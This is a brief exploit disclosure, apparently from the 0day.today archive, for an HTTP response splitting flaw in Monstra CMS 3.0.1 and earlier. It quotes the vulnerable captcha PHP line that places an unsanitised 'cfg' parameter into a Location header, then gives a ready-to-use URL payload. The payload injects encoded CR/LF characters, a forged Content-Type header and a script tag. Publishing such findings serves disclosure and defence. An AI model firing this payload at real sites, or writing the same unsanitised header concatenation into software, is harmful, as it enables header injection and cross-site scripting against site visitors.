id: 22854
date: 11/12/2014
title: Monstra <= 3.0.1 HTTP Response Splitting
author: Paulos Yibelo
cves: 

Monstra <= 3.0.1 HTTP Response Splitting

/plugins/captcha/crypt/cryptographp.php

SetCookie("cryptcookietest", "1");
Header("Location:
cryptographp.inc.php?cfg=".$_GET['cfg']."&sn=".session_name()."&".SID);

so providing 

http://localhost/mons/plugins/captcha/crypt/cryptographp.php?cfg=%0A%0DContent-T
ype:%20text/html%0A%0D%0A%0D%3Cscript%3Ealert%281%29%3C/script%3E&

Would result a CRLF injection.

#  0day.today [2023-03-23]  #